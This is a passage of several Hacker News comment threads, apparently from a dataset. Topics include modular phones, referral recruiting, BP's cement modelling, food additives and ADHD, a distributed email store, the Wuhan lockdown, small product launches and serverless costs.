platform.
This will be absolutely huge in the developing world where utility >>
convenience or aesthetics.
------
Zak
I find this interesting in contrast to Nexus devices. Two or three years ago,
most Android phones had SD cards and removable batteries. These features have
been conspicuously absent from recent Nexus phones in spite of their appeal to
the power-user and developer markets who are among the most likely to want
such features.
I hope it gets some traction. I'm seeing a lot of sameness in high-spec
Android phones, and something like this might help manufacturers learn what
kinds of variations might sell without having to take the risk of mass-
producing and marketing a new model.
P.S. - if any manufacturers are reading this, I want a high-spec Android phone
the size of an iPhone. My Nexus 5 is somewhat uncomfortable in my pocket and
too hard to use one-handed due to its size.
~~~
psbp
Moto X.
~~~
Zak
I'm not sure what part of my comment you're responding to, but I don't think
the Moto X is a good response to anything I said. It doesn't have removable
storage. It doesn't have a removable battery. With a 4.7" screen, it's much
bigger than an iPhone.
~~~
mikeevans
Have you seen how big it is next to an iPhone? Pretty close in physical size,
despite the screen.
[http://i-cdn.phonearena.com/images/reviews/142861-image/Appl...](http://i-cdn.phonearena.com/images/reviews/142861-image/Apple-
iPhone-5s-vs-Motorola-Moto-X-001.jpg)
~~~
Zak
My mother owns a Moto X, bought on my recommendation. It is much closer in
width to my Nexus 5 than it is to the iPhone and barely more comfortable for
me to use one-handed than my Nexus 5. The difference in width is apparent in
the photograph you linked.
I commend Motorola for an excellent job eliminating non-screen area on the
front of the Moto X. It's a very space-efficient device in that regard, but my
complaint is about reaching all areas of a touchscreen with my thumb while
holding it in one hand, and nothing fixes that like a smaller touchscreen.
------
LarryMade2
Yeah, right.
I remember computers built in the 90s and 2000s, touting their modular
construction and never having to buy a new system again. I wonder if those
machines are still in operation?
I think what would guarantee longevity is something that is rock-solid good,
inexpensive, repairable, and easy to develop on. I'm thinking of track records
of computers like the Commodore 64, iMac, or in vehicles like the beetle,
video game consoles, ipod, iphone etc.
~~~
bane
You mean, pretty much any computer not made by Apple? Sure, I still have my
home-rolled desktop from 7 years ago. I just put together a new machine
earlier this year I expect to get at _least_ that much life out of. I don't
even buy top-spec parts, just good price/performance ratios for each part and
cobble it together. And if something breaks I can fix it myself.
It's not too technical and not too hard to do. About as complicated as making
a full dinner with main course, two side dishes and a dessert.
On the flip side, every other machine I've had that was closed, mostly
laptops, but I'm thinking of my C64, and my Coco2, when the smallest piece
died on those things, right into the trash they went. There's literally
nothing you can do to fix them that doesn't involve an engineering degree and
a lab.
------
AndrewDucker
If one of the modules can be a keyboard, then I know a fair few people who
will buy one...
~~~
Slackwise
The keyboard is _the_ module I want.
I used my T-Mobile G2 until it died a month ago, and had to do an emergency
replacement, which ended up being a Nexus 5. I'm going absolutely insane not
being able to just type without thinking about it. When you have to think
about your input and often correct it, you are no longer able to simply stream
your thoughts, and each micro-interruption is actually quite a distraction
from getting things done. It's frustrating.
------
CHY872
Yeah this is probably just one of Google's projects where they try and make a
device that totally uses the concept, realise that most of it's pretty bad and
redo it with a device that uses it for the single part that worked. The cynic
in me says 'replaceable battery' but I'd like to see replaceable SOC.
~~~
josefresco
Screen and battery are the two most common complaints/issues with current
phones. Simply allowing consumers to buy and swap these two parts would go a
long way.
------
ctdonath
As technology continues to shrink more functionality into less space, it
crosses the threshold where human limits require the device be _at least this
big_ (whatever that size/shape minimum is). A screen can only be so small
before it's practically unreadable. A touch area must provide at least so much
space between tap targets and accommodate "fat fingers". The box of a phone
must be big enough to hold comfortably to an ear. A small matchbox-size device
would just plain be too awkward to use.
Seems Apple initiated the unchangeable phone (no swappable battery, extremely
tight/solid tolerances) in part to get all that core functionality inside a
box that small. Sufficient battery required X×Y×Z volume; making it
removable wasted a nontrivial amount of that, affecting talk time &
durability.
Now that core functionality can be _smaller_ than the minimum usable size,
including battery life acceptable to most users, there's some space again to
"waste" on components like pluggable interconnects, module packaging (so a
part is not fully exposed when removed), air gaps, etc.
"This here's a good axe. It's had nine handles and three heads."
"This is the last phone I bought. It's had nine batteries, three CPUs, two
displays, four radios, ..."
------
higherpurpose
If you read Clayton Christensen's Innovator's Solution [1] book (sequel to
Innovator's Dilemma), you'll see him talk about "integration" and
"disintegration" (basically the modularization of a product or market).
So in the early days of a new market/category of product, the products are
highly integrated, for several reasons. One is that the market is still new,
so there isn't much of an "ecosystem" to begin with. Another is that the
company with the "first mover's advantage" wants to keep stuff proprietary as
much as possible, and another is that the product still kind of "sucks" in
some areas (camera, battery life, in early days of the iPhone for example -
compared to the traditional competition). So they need to make everything work
as tightly as possible, to squeeze all the possible optimization out of it.
But eventually, the market becomes mature, the ecosystem grows, and the
products become "good enough" for most people. So much of that extreme
optimization or need to keep everything proprietary and in-house isn't needed
anymore, and you actually start getting some advantages from the
modularization of the market, such as buying a better modem from a "modem
company" than you could make yourself, and so on.
For a while I wasn't sure this was going to happen to the smartphone market
(ignoring the fact that there has been an increasing trend towards
customization through colors and whatnot), because for one the smartphone is a
very tightly put together product, and it's hard to imagine how it could've
been separated into a dozen different pieces without being junk, and two, for
a while the trend was towards increasing "closeness" of devices, rather than
openness.
But it seems it's going to happen, and ARA looks just about right (I wasn't a
big fan of the Phonebloks pin-model). Still, even if the strategy here is
"correct", and most likely on the _right side of history_ , Google will still
need to excel at execution, and make sure using such a phone gives very few
disadvantages compared to a regular phone, but many more advantages (being
able to use whatever camera you want, without buying a $700 phone every year,
and so on). Otherwise, people could be turned off by the initial version, and
then it will be a lot harder to convince them what a good idea this is. But
for now I'm optimistic.
[1] - [http://www.amazon.com/Innovators-Solution-Creating-
Sustainin...](http://www.amazon.com/Innovators-Solution-Creating-Sustaining-
Successful-
ebook/dp/B00E257S7C/ref=sr_1_1_bnp_1_kin?ie=UTF8&qid=1397650807&sr=8-1&keywords=innovator%27s+solution)
~~~
andosa
> So in the early days of a new market/category of product, the products are
> highly integrated
Not sure about this one, seems like the opposite to me. Twenty years ago, PC's
were very modular, and it was very common to add/upgrade a sound card, memory,
cpu, video card etc. Fast forward to now, and for the most common computing
devices (think tablets and smartphones), there is almost zero modularity or
upgradability. Even with current PC's (i.e. mostly laptops), it's increasingly
limited.
The same trend is apparent in other similar technology. For example with
analog TV, people could add a PAL block if their TV was NTSC or SECAM.
Upgrading your car used to be significantly easier etc.
~~~
divy
You're forgetting the first wave of PC's - Apple II, TRS-80, TI-99, C64, etc.
These machines had very little modularity compared to the wave of beige boxes
that followed the IBM PC standard. I think Christensen even uses that as an
example.
~~~
uxp100
The S-100 bus-based machines before those were very modular, if perhaps not
PCs in the same sense.
------
Zigurd
I give this about a 5% chance of success, and 1% market share, maybe less, if
it does succeed. That's still more than 10 million units per year, so not a
failure. But this isn't going to be _your_ next phone.
If it falls much below that unit volume, the scheme implodes because the
optional components will not find enough of a market to get manufactured.
In order to succeed, the internal connectivity scheme needs to not go obsolete
over at least two, and preferably three product generations.
It also needs to find a market. People still build their own PCs for gaming,
for lab automation, and other distinctly minority pursuits. So far, the niche
for this product seems to be "people who find the idea attractive but can't
articulate an actual need."
~~~
blah314
If all my module slots can go to batteries, I'll be tempted.
~~~
higherpurpose
I think they said at least 2 modules can be used as battery (the larger ones).
------
drakaal
Raise your hand if you bought an "upgradable" motherboard in the 286 and 386
days.... Do you still have it?
I have a computer that still uses some of the same screws that my 486 used.
For a long time I kept the original hard disk spinning even though I didn't
store stuff on it... But when IDE connectors went away I stopped bothering
with keeping it for nostalgia.
Even my case is no longer compatible, the power supply stopped being
compatible long ago.
Some of this is "advancements"; some of it is just that manufacturers want to
sell you new stuff.
Houses are about the only thing that are modular and you can say you will only
need to buy one... The house I grew up in is nearly 200 years old. So far it
hasn't needed to be replaced due to incompatibility.
------
bausson
There is a market, or should I say: there are markets:
* people who often break their screens (my current boss is at 3 screens in 2 years, and counting)
* enthusiasts, early adopters, developers, ...
* there is probably a good way to market it in developing countries too.
I would love having that phone, even more with a firefoxOS running on it.
Having that platform with open hardware specifications would be a huge boon
for it to become a viable ecosystem. I could see FirefoxOS and Windows Phone
boarding it quite easily if it takes off.
PS: whether the specifications are open or not, IDK at the moment, not a lot of
reliable information being available. Wishful thinking on my part I suppose.
Still hoping.
------
joshuapants
As someone mourning the fall of the full-qwerty physical keyboard phone (yes
there are the new BB phones, but by the next time I upgrade I anticipate that
BB will be dead), this gives me hope. There may not be enough people who want
them for manufacturers to make whole phones, but maybe there are enough to
support a market in quality keyboard modules.
------
eric_cc
This is not marketed at me.
My phone buying thought process: Does this phone have the software I care
about? Are apps tested to work with my exact device? Sold.
I do not want to spend a split second thinking about modules or RAM or
anything and I'm a very technical person. I cannot imagine my mom dealing with
this crap.
What is the market here? I would pay a premium to NOT deal with modules.
~~~
stackcollision
Once this is out, you _are_ paying a premium to not deal with modules by not
getting one. It's a $50 phone you can swap components in and out of as
upgrades become available. To me, that's infinitely better than buying a new
$300 smartphone every other year.
But there's also a second appeal. Right now, phones are impenetrable black-
boxes. You get what the manufacturer thinks you want. The reason I think a
modular phone will become very popular is the same reason the AR-15 is the
most popular gun in America: because you can play with it. You can swap parts
in and out depending on what you need.
"Oh, I'm going hiking today? Better stick my extra-big battery and wide-field
camera into my phone."
"Apple's putting a new zillion-byte SSD in the iPhone 9Q? Well good thing I
can just buy the zillion-byte module for my modular phone instead of having to
buy a whole new one."
And a million other examples.
------
fiatjaf
Where are all those comments, blog posts and experts' analyses saying
Phonebloks could never work in this world?
------
encoderer
I think the real-world use cases for a modular consumer device--like the
Sasquatch of meaningful OOP code reuse--are overstated.
I think this could work for business use. But the consumer equation is tricky.
Phones are fashion. Also phones take a lot of abuse.
------
id
I really don't think phones will stay the way they are for decades. And
modular phones definitely won't bear up for decades.
At some point every piece of the phone will have been exchanged, making it a
completely new phone.
~~~
Tyrannosaurs
Is that a new phone though?
_invents the question of the philosopher 's modular mobile phone_
~~~
id
The ship of Theseus is a thought experiment that raises the exact same
question.
[https://en.wikipedia.org/wiki/Ship_of_Theseus](https://en.wikipedia.org/wiki/Ship_of_Theseus)
[https://en.wikipedia.org/wiki/Identity_and_change](https://en.wikipedia.org/wiki/Identity_and_change)
~~~
Tyrannosaurs
I love that that Wikipedia article references Sugababes - a British pop band
which has changed its entire line-up over its existence (begging the question:
is it still the same band).
------
koalaman
I wish someone had done this for PCs 20 years ago.
~~~
stackcollision
Can you clarify what you mean? Maybe not 20, but 15 years ago my dad was
mucking around in the guts of our family computer, performing his own
upgrades. By the time we got rid of that thing the only original component was
the case. And nowadays you can order any piece of hardware you want off the
internet and slap it in.
------
gcb0
heh. you guys really have any hope? just count the number of devices google and
its nexus partners released without even a sd card slot! motorola too since
the google devices started.
the market demands that fast obsolescence and they are evil now. the only thing
holding back the nexus one as a strong daily phone is that it has no space
for more than 5 modern apps. it does if you hack android 2.3 to install apps
on the SD...
anyway. i wouldn't hold my breath. this is being done just to fail and harm
other people pursuing it honestly. cynic much? probably. but i am mostly
stating facts. how much does a sd slot save in costs on your $600 phone?
nothing. how many years did its lack cut from the device longevity? more than
half.
edit: plus the feature they advertise most is electromagnets! on a device
where the biggest concern is battery... and which will have a case anyway that
could hold everything together in case they used simple mechanical latches.
------
kevingadd
It's a little gross that they seemingly picked up the PhoneBloks project and
then entirely erased any traces of the original product and its creators.
Hopefully that team's still involved and getting compensated...
~~~
itp
From reading
[http://en.wikipedia.org/wiki/Project_Ara#Development](http://en.wikipedia.org/wiki/Project_Ara#Development)
I'm not sure it's fair or accurate to say they "seemingly picked up the
PhoneBloks project."
| {
"pile_set_name": "HackerNews"
} |
SpringRole – Everyone is a Recruiter - misbah143
https://medium.com/@kar2905/springrole-everyone-is-a-recruiter-a4ba7d1e0578
======
vitd
When they say they've "written 2,000 checks worth $45,000," they're basically
saying they'll pay you, on average, ~$11 per referral? Most employers I've
worked for pay at least $250 per referral for regular work, and much more if
they have an urgent or very specialized need. I'm not sure I see the advantage
of joining this network over just referring people to my current employer.
------
siganakis
Am I right in guessing that a "Passive user" is a user whom you collect
information on without them opting in? E.g. by scraping public profiles or
collecting connections from registered users?
Is it possible to view / check / correct any information about myself if I am
a "passive user" on your platform?
Many EU countries and Australia have privacy laws around these basic rights.
------
irickt
Site: [http://springrole.com/](http://springrole.com/)
BP oil rig modelling software showed cement unstable days before blast - DMPenfold2008
http://www.computerworlduk.com/news/it-business/3248321/deepwater-horizon-modelling-software-showed-bp-cement-conditions-unstable/
======
jared314
I like the subtitle better: Oil giant decided data was unreliable and took
other steps.
Just remember this when the reverse happens, where the model is wrong and they
ignore all evidence to the contrary.
~~~
scott_s
But did they decide the data was unreliable because they didn't like the
conclusion, or because they had genuine reservations about the validity of the
model and/or data? And if they did, why check the model, anyway?
What worries me about the mentality of "I'm not confident in this data, but
let's check the model anyway" is that being irrational creatures, we're likely
to use a positive result from the model as evidence that everything is okay,
but ignore a negative result because the data is unreliable. That is,
different results, same conclusion. This is not logically valid, but we're
irrational creatures and it takes discipline to avoid the fallacy.
~~~
Retric
I assume they did not like the conclusion.
_The company conducted a separate negative pressure test...
The test was failed, but was – for an unexplained reason – deemed a “complete
success” by both BP and rig owner Transocean at the time, a presentation on
Monday said._
------
z92
It's rate of false positive that really matters. When that software says
something is wrong at magnitude-X and with a very low false positive rate that
thing is really wrong at that scale, then I shall agree it was BPs fault for
ignoring it.
What You Can Do with a 13-Year-Old Laptop - sT370ma2
https://cheapskatesguide.org/articles/what-a-thirteen-can-do.html
======
dddddaviddddd
Getting a quality battery is the biggest obstacle for me to use old hardware.
Otherwise would honestly consider using a PowerBook G3.
Research Shows ADHD Increased by Food Additives - charzom
http://www.nytimes.com/2007/09/06/health/research/06hyper.html?ex=1346731200&en=dbf718c298c91c04&ei=5090&partner=rssuserland&emc=rss
======
danteembermage
The trouble with these kinds of studies (and with empirical evidence in
general) is that there are often omitted correlating factors left out of the
analysis. Doctors would be sure to control diet and other medications,
economists would control socioeconomic status, sociologists would look for
cultural factors, etc. However, they're not going to do two or three of these
sets at once so the result is a biased study no matter who performs it.
In this case I think a good potential omitted factor is the level of parental
discipline. Suppose parents A are Dr. Spock laissez-faire with their kids.
This is most likely correlated with: not sitting still for the family meal,
watching a lot of television, and getting their way in public places. So Junior
gets lots of TV dinners, quick snacks, and time with the power rangers, so he
wants to do karate instead of read Fox in Socks.
Parents B run a tight ship and consequently their vegan, free-range fed
wonder-child is happy to sit on the magic carpet and hear about anything so
long as it's not The Wealth of Nations again.
Applying the overused correlation != causation mantra is a bit cheap, to be
fair we must follow the immediate next step, "If correlation != causation,
why?" I think here we have plenty of compelling falsifiable narratives to try
before we make green key-lime pie illegal.
~~~
greendestiny
Well its a shame you didn't read the article, they conducted a placebo
controlled study where they randomly introduced these additives into the
children's diets. There really should be no systemic effect from self-
selection, apart from in the recruitment process (which they don't discuss).
------
iamwil
I remember NPR doing a story on this. Their conclusion was that the headline's
a little misleading. It should say SOME food additives may cause ADHD behavior
in SOME children.
I guess the effect is small and affects those predisposed.
------
kingkongrevenge
This is much less surprising than the research on Omega 3 fatty acids and
hyperactivity.
Researchers found that supplementing problem kids with fish oil had dramatic
effects. Youth offenders showed something like a 40% drop in recidivism vs the
control. Low grade-level readers mostly rose to grade level within months.
The implication of this is that lousy food is causing criminality and
stupidity. The UK government concluded from this research that it would be
very cost effective to provide fish oil supplements to school children.
But here's the scary bit: there aren't enough fish in the world. Once they ran
the numbers they found it would be impossible.
------
curi
_Common food additives and colorings can increase hyperactive behavior in a
broad range of children, a study being released today found.
It was the first time researchers conclusively and scientifically confirmed a
link that had long been suspected by many parents. Numerous support groups for
attention deficit hyperactivity disorder have for years recommended removing
such ingredients from diets, although experts have continued to debate the
evidence._
So, the parents and support groups "knew" the answer _before_ there was
scientific evidence supporting their claims.
So, they didn't know, they just have an unscientific agenda.
Now the article acts like their position was validated. It was not. Its
scientific status hasn't changed whether science happens to reach the same
conclusion or not. They are irrational either way.
------
curi
_In response to the study, the Food Standards Agency advised parents to
monitor their children's activity and, if they noted a marked change with food
containing additives, to adjust their diets accordingly, eliminating
artificial colors and preservatives._
That's stupid too. Parents aren't going to monitor children's behavior
_scientifically_. They aren't going to record it carefully and objectively and
compare it to control data previously recorded. This advice will simply lead
them to act on whims and fancies.
ElasticInbox – Open Source Distributed Email Store - zheng
http://www.elasticinbox.com/
======
Icer5k
Interesting concept, especially with the recent changes Google has made to
GMail/Apps. The biggest benefit/downside that jumps out at me is the
complexity required to run an email system this way - Cassandra clusters,
LDAP, external MTAs, and web severs all need to be managed. Obviously every
email system requires these components to run, but most full-blown systems
handle the relationships between components on their own.
TL;DR - Looks great for large businesses or maybe as a platform for a startup,
but not as a hobbyist project.
~~~
Down_n_Out
I was thinking the exact same thing, I'd love to test it out, but for the
moment (it might change in the future, I'm being hopeful) it's a tad too
complex to setup for even a test ... I will keep an eye on the project though!
------
jello4pres
This looks really cool. Have you gotten anybody using it already, and what's
the feedback been like so far?
------
zheng
This really does appeal to me, but I wish it didn't rely on Cassandra. That's
a heavy dependency if you would otherwise have no java in your stack which
many mail servers probably wouldn't. It's certainly an interesting departure
from flat files or standard databases though.
~~~
wheaties
Fork it. I'm planning on doing just that.
------
ibotty
hmm. email is one of the things that scales extremely well (see dovecot's
directors for a sophisticated but simple way). i don't know why you would need
such a big hammer.
~~~
mvip
Well yes, but they usually rely on traditional storage methods (on disk or via
something like NFS shares). Normally they use sharding based on the mailbox
name and spread it across multiple storage backends.
The only mailserver before this that stepped away from this methodology as far
as I can remember was DBMail, but it suffered from many other issues instead.
Using Blob-store like S3 (with some kind of encryption) combined with a db
with metadata makes a lot of sense to me for this application. Alternatively,
storing it all in something like MongoDB's ReplicaSet would also be
interesting.
Now, if ElasticInbox is the best tool for this is a separate discussion, but
this type of architecture sure is compelling.
~~~
zheng
I'd agree with your comment about the architecture being compelling. Do you
know of any alternatives that are designed with scalability in mind?
Ask HN: Why is it hard to get a job in California? - ryanlm
If you're from a different state, how hard is it to find Software Engineering work in another state? I'm finishing undergrad from a State School in December.
======
jpeg_hero
its 100x easier if you are local.
sublet a place in sf for 3 months, odds are you'll find a gig.
in order for companies to call an out of state fresh grad staying at home, you
really need to stand out (great gpa, "hard programming" personal projects)
~~~
ryanlm
I have "hard programming" personal projects. All my projects are in low level
C. I have a data structure library, (think C++ stl). I also have a programming
language I built in C with an AST, and function calls, variables, all that.
~~~
jpeg_hero
Yeah, that's the type of stuff you'd need to stand out.
Its still harder to stay home, but if you are, here are a few tips: leave your
address off your cv. Recruiters will still see the location of your undergrad
but hopefully you'll get a phone interview (and pass it) and when they ask you
where you are located, tell them, but then also say something along the lines
of "I am moving to sf January 15th" something like that.
Bigcos will play more ball than start ups.
What is Your favorite free/open license to work with? - afiori
======
jrepinc
GPL →
[https://www.gnu.org/licenses/gpl-3.0.html](https://www.gnu.org/licenses/gpl-3.0.html)
Because it provides the highest assurance/protection that others who get my
software will have the same freedoms I had when I got the GPL-ed software, and
no one can take these freedoms away.
Gov't, certificate authorities conspire to spy on SSL users? - kmod
http://arstechnica.com/security/news/2010/03/govts-certificate-authorities-conspire-to-spy-on-ssl-users.ars#
======
CWuestefeld
This story is interesting in the context of recent discussions about
WikiLeaks. They'd seem a prime target for eavesdropping.
Measuring - mnemonik
http://dilbert.com/blog/entry/measuring/
======
davi
If anyone doesn't know, wattvision is a YC startup.
<http://news.ycombinator.com/item?id=832216>
------
raheemm
_I think that government in particular needs to provide a web-based dashboard
of stats to its citizens so we can see how the country is doing._
This is a great idea and should be easy to implement. A lot of data is already
collected by the gov. Perhaps the gov 2.0 project might make this one step
closer to reality.
~~~
kingkongreveng_
The stats the government already provides are baked to hell, and manipulated
to suit the political cycle. It's a stupid idea.
The government shouldn't even be in the measurement and statistics business.
We need a census and that's about it. Why should the government calculate GDP
and so on? Competing private estimations provide greater depth already.
Wuhan scientists: What it’s like to be on lockdown - bookofjoe
https://www.nature.com/articles/d41586-020-00191-5
======
xgantan
As a Canadian, I'm currently visiting my family in Changsha, a city about 4
hours of a drive south of Wuhan. In the city, everyone is on edge. All public
places such as restaurants, gyms and night clubs are closed. And everyone on
the street wears a surgical or N95 mask. Not only Wuhan, but the entire
country is also on lockdown.
It sucks but the people and the government have aligned themselves together to
do whatever it takes to contain and control the coronavirus. Let's be strong
and have faith.
------
ycombonator
Approximately 58 million in lockdown, this is apocalyptic.
From South China Morning Post. Chaos in hospitals:
[https://www.youtube.com/watch?time_continue=22&v=CfcIHUdOI8w...](https://www.youtube.com/watch?time_continue=22&v=CfcIHUdOI8w&feature=emb_title)
[https://www.zerohedge.com/political/56-million-chinese-
lockd...](https://www.zerohedge.com/political/56-million-chinese-lockdown-
virus-spreads-australia-malaysia)
~~~
dgellow
In case people don't want to click on a zerohedge article, here is the actual
source for the claim "China expands coronavirus outbreak lockdown to 56
million people", from Aljazeera:
[https://www.aljazeera.com/news/2020/01/china-expands-
coronav...](https://www.aljazeera.com/news/2020/01/china-expands-coronavirus-
outbreak-lockdown-fast-tracks-hospital-200124201635848.html)
~~~
ropiwqefjnpoa
I find ZeroHedge usually has links to the source articles and they are often
"mainstream".
~~~
SolaceQuantum
I don't mind ZeroHedge as it often cites news that isn't picked up on
MSM. However, I have a massive concern about the bias in ZeroHedge. I remember
once reading an article in which the final lines are something bold and along
the lines of "remember they hate you and are coming for you" type rhetoric.
That was completely not cited. I find that extremely concerning.
Also, similarly, they at one point ran an article about a John Hopkins doctor
who is against gender affirmation treatment towards trans people. I googled
more about their papers and the like, only to find that the doctor only
published their work in religious-oriented research and has actually been
disavowed by several medical practitioners who specialize in trans medical
concerns. None of this was cited in the article.
This has overall made me quite leery of the validity of ZeroHedge on anything
but the links that ZeroHedge cites.
~~~
cdiddy2
Generally with zerohedge I mostly stick to the financial stuff, since that is
usually properly sourced, even if the site does have a bearish bias its still
usually good info. There are definitely some heavily biased political articles
though.
------
Merrill
The restrictions on travel in China will be an interesting experiment in how
much interurban travel is essential.
My take would be that with modern communications and IT infrastructure, there
is actually very little need for interurban travel not associated with the
movement of physical goods, i.e. not associated with truck drivers, rail
crews, barge crews, air freight pilots, and so forth. Most other travel can be
replaced by communications.
~~~
dougb5
While much business travel may be inessential, family visits for Lunar New
Year are surely essential for many people, so this is a tough time for such an
experiment. I was surprised to learn that there are normally 3 billion
passenger-journeys in China during the Lunar New Year period!
([https://en.wikipedia.org/wiki/Chunyun](https://en.wikipedia.org/wiki/Chunyun)).
------
ggm
If you want less hyperbolic information i recommend
[https://promedmail.org/](https://promedmail.org/)
------
FooBarWidget
I have read that Wuhan hospitals are accepting supplies donations. Anyone
knows what supplies they need, how to buy them and how to donate?
~~~
fspeech
Here is the official channel:
[http://www.hubei.gov.cn/zhuanti/2020/gzxxgzbd/zxtb/202001/t2...](http://www.hubei.gov.cn/zhuanti/2020/gzxxgzbd/zxtb/202001/t20200126_2015047.shtml)
There are other calls for help directly from hospitals. Some private hospitals
may be in particularly bad shape. However shipping could be an issue if one
doesn't want to use official channels. The government page does say that you
could designate donees 定向捐赠.
~~~
jannes
Even though I don't understand a single word on that page, I immediately
recognised that they are using Bootstrap.
For whatever reason I didn't expect them to use a western design tool. It's
interesting how far Bootstrap is spreading into all corners of the world.
------
egberts1
I am old enough to remember the SARS breakout that began in Wuhan in 2004.
It’s happening again!
~~~
rfoo
You mean old enough to mis-remember the SARS breakout?
It began in Guangdong in late 2002.
------
nickgrosvenor
I actually think China’s done an admirable job containing this virus. I think
what they’ve done will probably work to stop the spread.
The most interesting part of this whole episode is the Orwellian efficiency
with which communist China can control its population at will.
~~~
fsh
Pretty much any country has some form of martial law. For example, the US very
quickly shut down one of their largest cities and all air travel in the
country on 9/11.
~~~
closeparen
The FAA already had discretionary authority over US airspace. Saying “no” to
everything all at once was unusual, but didn’t exercise any new power. Martial
law is more like “sudo” for the executive branch, letting it do what would not
otherwise be legal.
------
ycombonator
[https://www.inkstonenews.com/health/chinas-coronavirus-
outbr...](https://www.inkstonenews.com/health/chinas-coronavirus-outbreak-may-
be-linked-penchant-people-eat-wildlife/article/3047304)
------
draugadrotten
Dr. Eric Feigl-Ding (Harvard): " HOLY MOTHER OF GOD - the new coronavirus is a
3.8!!! How bad is that reproductive R0 value? It is thermonuclear pandemic
level bad - never seen an actual virality coefficient outside of Twitter in my
entire career. I’m not exaggerating..."
[https://threadreaderapp.com/thread/1220919589623803905.html](https://threadreaderapp.com/thread/1220919589623803905.html)
~~~
tempsy
Obscene level of fear mongering based on data that was later revised down. I
can’t believe he thought that thread was a good idea.
~~~
dilly_li
Where is the updated version?
~~~
dtolnay
Revised down to 2.6:
[https://threadreaderapp.com/thread/1221132573340061697.html](https://threadreaderapp.com/thread/1221132573340061697.html)
~~~
myth_drannon
Still very high.
~~~
akiselev
No, it's middling at best. Measles in a totally unvaccinated population (R0 =
12-18) is very high [1]. An R0 of 2.6 is a relative cakewalk.
[1]
[https://en.wikipedia.org/wiki/Basic_reproduction_number](https://en.wikipedia.org/wiki/Basic_reproduction_number)
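To make the R0 comparison above concrete, here is a rough back-of-the-envelope sketch (not from the thread; the generation count is an arbitrary illustration, and it ignores immunity, interventions, and overlapping generations):

```python
# In a fully susceptible population, one index case yields roughly
# R0**n new cases after n transmission generations.
def cases_after(r0: float, generations: int) -> float:
    return r0 ** generations

print(round(cases_after(2.6, 5)))  # ~119 cases from one, over 5 generations
print(cases_after(12, 5))          # 248832 for a measles-like R0 of 12
```

The exponential makes the point: even "middling" R0 values compound quickly, but the gap between 2.6 and 12 is enormous after only a few generations.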
Show HN: Vimalin - Backup VMware Fusion VMs, even when they are still running - wila
https://www.vimalin.com/show-case/backup-your-vmware-fusion-vms-even-when-they-are-still-running/
======
somvie
Looks cool, but I do not own a mac.
Have you thought about building this for VMware Workstation?
~~~
wila
Hi, thanks for the question.
This is the most common question I get whenever I introduce Vimalin. "Where's
the Windows version?"
It is not there yet, but this is something that I am actively working on and
hope to have ready for a beta soon.
| {
"pile_set_name": "HackerNews"
} |
Show HN: I made a minimalist tool to automate approval workflow via Google Forms - TommyL128
https://performflow.com/
======
TommyL128
Hey, creator here. I used to be a developer and now I have a small store on
Shopify. Doing ecommerce is fun, yet managing the purchasing workflow was
frustrating.
I searched for a solution and there was a tool named Kissflow that could help
me, but it was costly and aimed at bigger teams. That's why I decided to build
a minimalist tool myself, and I chose Apps Script, a free scripting platform
from Google, to build a Google Forms add-on. (Google Forms is simple and
easy-to-use, and I've always had an entrepreneurial mindset, so I planned to
upload it to the Gsuite Marketplace to have external users too)
Then, Firebase is for database due to its realtime feature, low cost, and
generous free quota. Also, I used Google Cloud Functions to handle small tasks
(backup, utilities,...) and things that Apps Script can't do.
The final result is PerformFlow, an add-on that can automate approval
workflows via Google Forms. It was uploaded to the Gsuite Marketplace and has
some users so far. Thanks to the good response from users, I added a new
feature to generate & send PDFs based on their feedback.
It's just a simple tool that utilizes Google Forms, so I'd love to have your
comments; ask me if you have any questions!
~~~
WhiteOwlLion
I was looking at HelloSign too. I volunteer with a non-profit that has forms
for adopting orphans abroad. The amount of paperwork is insane. Being able to
leverage same data points (date, name, address, etc) and apply it to multiple
forms is a good idea. HR would benefit too. New hire paper work. In 2019,
you'd think this would be all online and digital, but there's still paper
involved for regulatory/legal reasons or because the old dinosaurs will not
retire yet.
| {
"pile_set_name": "HackerNews"
} |
Show HN: Perfect Postcards - $2 to the US, $3 to everywhere else - thebiglebrewski
https://www.postperfect.co
======
mstolpm
I don't understand the problem you're trying to solve: The site doesn't tell
me what it is about, why I should bother and who is behind it. Moreover, the
selection of postcards is very limited and not what I would expect to be the
"perfect postcard".
~~~
thebiglebrewski
The problem I'm trying to solve: normally, when you're in another city it's
hard to purchase, write out, buy postage for, and then identify the correct
mailbox for a postcard.
It's also just meant to provide a really simple and easy way to send a
postcard to someone. Some of the cards are holiday cards and others are
greetings from where I'm based here in NYC.
What kind of postcards would you like to see on the site? I purchased the
rights for each card so that's why the selection might be construed as a bit
limited.
Thanks for your feedback!
------
thebiglebrewski
Would love some feedback on this! Thanks anybody for commenting =)
| {
"pile_set_name": "HackerNews"
} |
The differing definitions of “serverless” - fagnerbrack
https://winterwindsoftware.com/serverless-definitions/
======
sbinthree
Certainly our AWS bill when we were using Lambda + API Gateway forced us to
"think about servers" and ask why we were paying 10x more for a
slower-responding application server to spin up for 15 minutes to process a
request that needs 50 MB of RAM for 10 ms, while being billed for the full
allocated amount at the 100 ms minimum. Learn from our pain: use EC2.
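The billing gap described above can be sketched numerically. The memory tier and rounding rules below are assumptions for illustration, not AWS's actual current pricing:

```python
# Lambda-style billing charges per GB-second of *allocated* memory,
# with duration rounded up to a 100 ms minimum, regardless of what
# the request actually used.

def billed_gb_seconds(memory_mb, duration_ms):
    """GB-seconds for one invocation."""
    return (memory_mb / 1024) * (duration_ms / 1000)

# What the request actually needed: ~50 MB for ~10 ms.
actual = billed_gb_seconds(50, 10)

# What gets billed: the full allocation (assume a 128 MB minimum tier)
# for the 100 ms minimum duration.
billed = billed_gb_seconds(128, 100)

print(round(billed / actual, 1))  # ~26x the resources actually consumed
```

Under these assumed numbers, each invocation pays for roughly 26x the resources it used, and that's before API Gateway's per-request fee, which the thread suggests was the larger cost.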
~~~
snazz
How much traffic were you receiving when it made financial sense to switch
from serverless to EC2?
~~~
sbinthree
I mean we only tolerated those bills for a few months before we had to switch,
but generally speaking we were handling on the order of 4-5M requests/day,
mostly low bandwidth. API Gateway, and wasting lots of allocated server
resources for each time the function ran, was just killing us. The load was
pretty constant, which was another reason to switch. No regrets either way,
but we should have done the billing math at production load and not just been
blinded by the free tier and the low cost per run.
| {
"pile_set_name": "HackerNews"
} |
Ask HN: Proxy JavaScript APIs through nginx? - antihero
